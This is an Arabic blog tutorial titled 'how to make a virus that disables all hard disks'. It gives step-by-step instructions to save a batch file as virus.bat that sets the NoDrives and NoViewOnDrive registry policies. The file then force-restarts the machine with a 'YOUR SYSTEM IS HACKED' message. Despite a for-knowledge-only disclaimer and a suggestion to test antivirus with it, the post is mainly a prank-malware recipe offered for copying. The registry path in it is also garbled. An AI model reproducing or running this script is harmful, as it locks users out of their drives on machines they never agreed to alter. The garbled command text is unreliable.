PREGNANCY BIRTH

المحترف في للمعلوميات

كيف تصنع فايروس يقوم بتعطيل جميع الاقراص الصلبة في جهاز الحاسوب

كيف تصنع فايروس يقوم بتعطيل جميع الاقراص الصلبة في جهاز الحاسوب – Hard Disks

هذا العصر هو عصر التكنولوجيا والعالم الافتراضي، ولكي تصبح ذكياً في هذه الايام يجب ان تكون ذكياً في العالم الحقيقي والعالم الافتراضي. ولذلك يجب عليك دائما الإلمام بالمهارات والحيل الجديدة التي سوف تساعدك على ان تصبح ذكياً في العالم الافتراضي. اليوم لدينا حيلة جديدة سوف تساعدك على بلوغ ذلك.
مستخدمي العالم الافتراضي يواجهون مشاكل الفيروسات، لكن هل قمت بإنشا ءفايروس حتى الان ؟، اليوم سوف نساعدك على إنشاء فايروس بسيط سوف يقوم بتعطيل  جميع الاقراص الصلبة في جهاز الحاسوب – Hard Disks. إنشاء هذا الفايروس بسيط للغاية وسوف تتمكن من ذلك في حال اتباعك للخطوات التي بالاسفل.
ملاحظة: هذا الفايروس من الممكن ان يقوم باتلاف دائم لجهاز الحاسوب ولذلك عليك استخدامه على مسؤوليتك الخاصة ونحن لسنا مسؤولين عن اي ضرر قد يلحق بك، وهذا الشرح فقط هو فقط للمعرفة ولجعلك تدرك ماهية هذا الفايروس.
كيف تصنع فايروس يقوم بتعطيل جميع الاقراص الصلبة في جهاز الحاسوب – Hard Disks
Create-a-Virus-That-Disable-All-Hard-Disks
هذه حيلة بسيطة سوف نستخدم بها “notepad” لتعطيل جميع الاقراص الصلبة في جهاز الحاسوب – Hard Disks، بسيطة لدرجة انك لا تحتاج لاي شيء سوى نسخ ولصق التعليمات البرمجية التي سوف نوفرها لك في الخطوات القادمة.
1) في البداية قم بالضغط على قائمة “start” واكتب “Notepad” وبعد ذلك قم بالضغط على زر ادخال على لوحة المفاتيح.
Notepad
2) الان قم بنسخ الكود التالي الذي بالاسفل وقم بلصقه في “notepad”.
REG ADD HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVER SIONPOLICIESEXPLORER /V NODRIVES /T REG_DWORD /D 12NREG ADD HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVER SIONPOLICIESEXPLORER /V NOVIEWONDRIVE /T REG_DWORD /D 12NSHUTDOWN -R -C ”LOLLLLL! YOUR SYSTEM IS HACKED BY AmnNet!” -F
code
3) الان قم بحفظه باي اسم المهم امتداد الملف ان يكون “bat” كالتالي “virus.bat”.
virus.bat
4) الان عندما تقوم بتشغيل هذا الملف على جهاز الحاسوب سوف يقوم بتعطيل جميع الاقراص الصلبة – Hard Disks واحداث ضرر يجهاز الحاسوب.
هذا هو اسلوب بسيط لإنشاء فايروس يقوم بتعطيل جميع الاقراص الصلبة  وبعد هذا سوف تقوم جميع الاقراص الصلبة بالتوقف عن العمل وسوف يتم ايقاف تشغيل جهاز الحاسوب الخاص بك بشكل فوري. هذا الفايروس يعتبر مؤذي ويمكنك ان تقوم باختبار برنامج مضاد الفيروسات الخاص بك عن طريق إجراء “Scan” لهذا الملف واذا قام باكتشافه فهذا يعتبر امر جيد واذا لم يكتشفه فهذا يعني انه عليك بالبحث عن مضاد فيروسات اخر.
لا تنسى مشاركة الموضوع مع اصدقائك.

0 التعليقات لــ "كيف تصنع فايروس يقوم بتعطيل جميع الاقراص الصلبة في جهاز الحاسوب "